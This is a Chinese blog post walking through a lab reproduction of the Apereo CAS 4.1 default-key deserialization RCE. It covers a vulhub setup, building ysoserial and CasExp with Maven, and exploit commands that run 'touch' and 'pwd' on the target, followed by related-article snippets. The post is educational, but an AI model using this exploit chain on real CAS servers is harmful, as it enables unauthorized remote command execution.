Apereo CAS 4.1反序列化RCE漏洞

最新推荐文章于 2024-05-22 11:24:20 发布
最新推荐文章于 2024-05-22 11:24:20 发布
阅读量760 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/112232698
版权

漏洞简介

Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。

版本: Apereo CAS <= 4.1.7

环境搭建

拉docker环境之后访问web界面http://127.0.0.1:8080/cas/login

在这里插入图片描述

下载安装相关工具

1、安装 jdk 1.8 ,配置好系统环境变量
2、安装 maven ,配置好系统环境变量

下载链接:https://maven.apache.org/download.cgi
在这里插入图片描述
mvn --version查看安装情况
在这里插入图片描述

3、下载ysoserial-master-4df2ee2bb5-1.jar

链接:https://jitpack.io/com/github/frohoff/ysoserial/master-4df2ee2bb5-1/ysoserial-master-4df2ee2bb5-1.jar

将其安装到本地Maven
注意更改文件位置:mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial-master-4df2ee2bb5-1.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpackaging=jar -DlocalRepositoryPath=my-repo
在这里插入图片描述

4、下载 CasExp 项目源码

链接:https://codeload.github.com/potats0/CasExp/zip/master

切换到CasExp-master文件,将pom.xml打包成jar文件
mvn clean package assembly:single

查看jar文件
在这里插入图片描述

漏洞复现

使用打包好的CasExp进行远程命令执行
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://192.168.5.129:8080/cas/login "touch /opt/Apereo"

在这里插入图片描述
登录虚拟机查看Apereo已创建
在这里插入图片描述

执行有回显的命令:java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://192.168.5.129:8080/cas/login "pwd"

在这里插入图片描述

或者生成payload抓包替换execution值:
下载工具:https://codeload.github.com/potats0/CasExp/zip/master

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

per_se_veran_ce
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3164
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
CAS4.1反序列化漏洞vulhub
m0_46580995的博客
07-31 2625
CAS 复现环境vulhub Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 漏洞原理使用了默认密钥changeit public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBean; private boolean co
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现
ADummy的博客
02-20 1978
Apereo CAS 4.1反序列化RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞Apereo Cas一般是用来做身份认证的,所以有一定的攻击
ysoserial下载和使用
c0529的博客
05-22 372
因为要用java打开jar格式的,所以如果下的是源文件,还需要打包,我试了试,我这个报错了,我也不知道哪里有问题。如果不报错可以自己试试打包的工作,说不定以后还有用到。所以我的建议是直接下载jar版本的。然后直接用java去运行就可以了。网址拖到下面就可以直接下载。
Apereo-cas4.1 反序列化 Rce漏洞复现
m0_58596609的博客
01-19 4934
Apereo-cas4.1 反序列化Rce漏洞复现
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
java反序列化工具
11-21
然而,这个过程也可能引入安全风险,因为不安全的反序列化可能导致远程代码执行(RCE漏洞。 在给定的标题和描述中,提到了几个关键的服务器端应用平台:JBoss、WebLogic和WebSphere。这些都是流行的Java企业级...
WebLogic反序列化RCE路径探测.md
07-09
WebLogic反序列化RCE路径探测
ysoserial-v0.0.5.jar
09-22
shiro反序列化漏洞的检查工具, 在githup上兜兜转转找了挺久, 上传留着给同事们分享,其他需要的拿去.
ysoserial.jar
10-31
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
04-22
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
Apereo CAS反序列化漏洞中数据加解密研究
weixin_43526443的博客
09-16 1727
Apereo CAS,全称为 Central Authentication Service,是一种开源的单点登录(SSO)解决方案。4.1.7版本之前存在AES默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。其中蓝队版的一个功能:一键解密流量工具,为实现**一键智能化**因此需要研究一下CAS漏洞利用中execution值的加解密算法!>结论:UUID + _ + 头部长度标识(7byte) + iv长度标识(1byte) + iv值(16byte) + keyN
【转载】ysoserial反序列化工具打包jar文件流程
mingyqf的博客
03-30 1832
ysoserial反序列化工具打包jar文件流程 [Fighter安全团队](javascript:void(0)😉 2021-01-31 22:28 00 — *前言* 身边很多朋友都不懂怎么将源码项目打包成jar文件,那么接着上一篇的环境就简单讲讲jar的打包流程,毕竟在github上有些项目都不是打包好的。这里以ysoserial为例,项目下载地址:https://codeload.github.com/frohoff/ysoserial/zip/master 01 — *idea打包jar * 导入
java安全(六)java反序列化2,ysoserial调试
weixin_45694388的博客
04-19 3816
ysoserial 下载地址:https://github.com/angelwhu/ysoserial ysoserial可以让⽤户根据⾃⼰选择的利⽤链,⽣成反序列化利⽤数据,通过将这些数据发送给⽬标,从⽽执⾏⽤户预先定义的命令。 什么是利⽤链? 利⽤链也叫“gadget chains”,我们通常称为gadget。如果你学过PHP反序列化漏洞,那么就可以将gadget理解为⼀种⽅法,它连接的是从触发位置开始到执⾏命令的位置结束,在PHP⾥可能 是 __desctruct 到 eval ;如果你没学过其他语
反序列化 RCE 漏洞
06-09
反序列化RCE漏洞是一种常见的安全漏洞,发生在Java、Python等语言中的反序列化过程中。攻击者利用该漏洞,可以在受害者系统上执行任意命令,从而实现对系统的完全控制。 该漏洞的原理是,攻击者在序列化对象时,通过精心构造的恶意数据,将一段可执行代码序列化到对象中。当该对象被反序列化时,攻击者的恶意代码就会被执行,从而导致系统被攻击者掌控。 为了避免反序列化RCE漏洞的发生,开发者应该注意以下几点: 1. 对于不受信任的数据,不要直接进行反序列化操作,可以使用JSON等其他格式进行传输。 2. 对于需要进行反序列化操作的数据,应该进行严格的验证和过滤,防止恶意数据的注入。 3. 在反序列化过程中,可以对反序列化的类进行限制,只允许反序列化指定的类。 4. 及时更新相关的依赖库,以修复已知的反序列化RCE漏洞。 总之,反序列化RCE漏洞是一种非常危险的漏洞,开发者和用户都需要注意防范和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值